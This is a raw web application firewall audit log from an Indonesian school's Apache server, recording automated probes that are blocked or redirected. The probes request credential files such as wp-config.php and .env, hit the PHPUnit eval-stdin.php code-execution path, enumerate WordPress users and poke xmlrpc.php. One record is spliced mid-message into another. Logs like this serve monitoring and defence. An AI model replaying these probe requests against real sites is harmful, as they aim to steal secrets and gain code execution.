Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4549af1a-Z-- --10876307-A-- [05/May/2025:19:09:02 +0700] aBiqXk2V_h1VFAgsfgZXBQAAABE 103.236.140.4 51282 103.236.140.4 8181 --10876307-B-- GET /wp-config.php_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 162.241.224.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.241.224.128 X-Forwarded-Proto: http Connection: close Accept: */* --10876307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10876307-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746446942022642 956 (- - -) Stopwatch2: 1746446942022642 956; combined=368, p1=325, p2=0, p3=0, p4=0, p5=43, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10876307-Z-- --f3636034-A-- [05/May/2025:19:52:10 +0700] aBi0ek2V_h1VFAgsfgZesQAAABA 103.236.140.4 47608 103.236.140.4 8181 --f3636034-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --f3636034-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3636034-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746449530212766 805 (- - -) Stopwatch2: 1746449530212766 805; combined=325, p1=286, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3636034-Z-- --ce65492f-A-- [05/May/2025:20:42:22 +0700] aBjAPk2V_h1VFAgsfgZmyAAAABg 103.236.140.4 47930 103.236.140.4 8181 --ce65492f-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.146.57.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.146.57.139 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ce65492f-C-- --ce65492f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce65492f-E-- --ce65492f-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --84cea873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84cea873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746455109040685 7828 (- - -) Stopwatch2: 1746455109040685 7828; combined=6155, p1=807, p2=5061, p3=51, p4=70, p5=101, sr=81, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84cea873-Z-- --ce3b9c65-A-- [05/May/2025:22:04:20 +0700] aBjTdE2V_h1VFAgsfgZ0YwAAAAg 103.236.140.4 38252 103.236.140.4 8181 --ce3b9c65-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.186.245 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 188.166.186.245 Accept-Encoding: gzip X-Varnish: 142943768 --ce3b9c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce3b9c65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746457460846251 720 (- - -) Stopwatch2: 1746457460846251 720; combined=269, p1=238, p2=0, p3=0, p4=0, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce3b9c65-Z-- --f2a67355-A-- [05/May/2025:22:04:42 +0700] aBjTivZJDMuQndL03JNPngAAAEo 103.236.140.4 38482 103.236.140.4 8181 --f2a67355-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2a67355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2a67355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746457482745171 2235 (- - -) Stopwatch2: 1746457482745171 2235; combined=1051, p1=359, p2=666, p3=0, p4=0, p5=25, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2a67355-Z-- --0b151d64-A-- [05/May/2025:22:04:45 +0700] aBjTjU2V_h1VFAgsfgZ0hgAAABg 103.236.140.4 38508 103.236.140.4 8181 --0b151d64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b151d64-C-- demo.sayHello --0b151d64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b151d64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746457485623724 6602 (- - -) Stopwatch2: 1746457485623724 6602; combined=4701, p1=612, p2=3832, p3=42, p4=42, p5=101, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b151d64-Z-- --ca939312-A-- [05/May/2025:22:15:05 +0700] aBjV-fZJDMuQndL03JNTcwAAAEQ 103.236.140.4 44620 103.236.140.4 8181 --ca939312-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca939312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca939312-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458105493640 2941 (- - -) Stopwatch2: 1746458105493640 2941; combined=1242, p1=400, p2=814, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca939312-Z-- --30cdde6a-A-- [05/May/2025:22:15:08 +0700] aBjV_PZJDMuQndL03JNTegAAAEI 103.236.140.4 44648 103.236.140.4 8181 --30cdde6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30cdde6a-C-- demo.sayHello --30cdde6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30cdde6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458108236818 6164 (- - -) Stopwatch2: 1746458108236818 6164; combined=4487, p1=552, p2=3693, p3=36, p4=36, p5=99, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30cdde6a-Z-- --f79bc818-A-- [05/May/2025:22:22:48 +0700] aBjXyPZJDMuQndL03JNUmgAAAEI 103.236.140.4 48486 103.236.140.4 8181 --f79bc818-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f79bc818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79bc818-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458568771157 3971 (- - -) Stopwatch2: 1746458568771157 3971; combined=2437, p1=631, p2=1751, p3=0, p4=0, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79bc818-Z-- --bf801e78-A-- [05/May/2025:22:22:51 +0700] aBjXy4ZWvR7-42f6JrAEeAAAAMo 103.236.140.4 48514 103.236.140.4 8181 --bf801e78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bf801e78-C-- demo.sayHello --bf801e78-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf801e78-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458571568346 6203 (- - -) Stopwatch2: 1746458571568346 6203; combined=4536, p1=588, p2=3684, p3=31, p4=34, p5=115, sr=123, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf801e78-Z-- --d05b9f39-A-- [05/May/2025:22:23:04 +0700] aBjX2ARwKNFSM6B7_LaaRgAAAIM 103.236.140.4 48602 103.236.140.4 8181 --d05b9f39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d05b9f39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d05b9f39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458584916008 2625 (- - -) Stopwatch2: 1746458584916008 2625; combined=1251, p1=422, p2=797, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d05b9f39-Z-- --e18faa46-A-- [05/May/2025:22:23:07 +0700] aBjX202V_h1VFAgsfgZ2CAAAABQ 103.236.140.4 48630 103.236.140.4 8181 --e18faa46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e18faa46-C-- demo.sayHello --e18faa46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e18faa46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458587991277 6085 (- - -) Stopwatch2: 1746458587991277 6085; combined=4393, p1=514, p2=3640, p3=35, p4=36, p5=98, sr=73, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e18faa46-Z-- --46c46e10-A-- [05/May/2025:22:23:21 +0700] aBjX6QRwKNFSM6B7_LaaSAAAAIg 103.236.140.4 48730 103.236.140.4 8181 --46c46e10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46c46e10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46c46e10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458601770787 2698 (- - -) Stopwatch2: 1746458601770787 2698; combined=1493, p1=468, p2=995, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46c46e10-Z-- --acf13923-A-- [05/May/2025:22:23:24 +0700] aBjX7ARwKNFSM6B7_LaaSgAAAJU 103.236.140.4 48762 103.236.140.4 8181 --acf13923-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acf13923-C-- demo.sayHello --acf13923-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf13923-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458604675169 5483 (- - -) Stopwatch2: 1746458604675169 5483; combined=4043, p1=524, p2=3292, p3=40, p4=33, p5=91, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf13923-Z-- --5e070834-A-- [05/May/2025:22:24:30 +0700] aBjYLoZWvR7-42f6JrAE_wAAAMw 103.236.140.4 49320 103.236.140.4 8181 --5e070834-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e070834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e070834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458670680393 2605 (- - -) Stopwatch2: 1746458670680393 2605; combined=1427, p1=441, p2=949, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e070834-Z-- --abc7423e-A-- [05/May/2025:22:24:33 +0700] aBjYMYZWvR7-42f6JrAFBQAAAMM 103.236.140.4 49348 103.236.140.4 8181 --abc7423e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abc7423e-C-- demo.sayHello --abc7423e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc7423e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458673582459 6188 (- - -) Stopwatch2: 1746458673582459 6188; combined=4364, p1=562, p2=3572, p3=30, p4=31, p5=100, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc7423e-Z-- --7408e410-A-- [05/May/2025:22:24:34 +0700] aBjYMvZJDMuQndL03JNUrwAAAFg 103.236.140.4 49358 103.236.140.4 8181 --7408e410-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7408e410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7408e410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458674314800 2907 (- - -) Stopwatch2: 1746458674314800 2907; combined=1227, p1=417, p2=775, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
